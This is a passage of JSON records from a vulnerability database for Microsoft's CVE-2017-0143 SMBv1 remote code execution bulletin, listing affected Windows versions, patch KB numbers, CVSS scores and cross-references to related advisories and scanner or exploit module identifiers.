"KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T02:48:57", "differentElements": ["msAffectedSoftware"], "edition": 45}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-14T04:52:34", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "saint", 
"idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3177186", "KB4013198", "KB3213986", "KB4012217", "KB3212646", "KB3205409", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB4012215", "KB4012214", "KB4012213", "KB4012216", "KB4013429", "KB4012212", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T04:52:34", "differentElements": ["msAffectedSoftware"], "edition": 46}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-16T11:28:55", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T11:28:55", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T11:28:55", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210720", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012606", "KB3213986", "KB4012213", "KB4012215", "KB3212646", "KB3205409", "KB4012212", "KB4013198", "KB4012217", "KB4012216", "KB4012598", "KB4013429", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
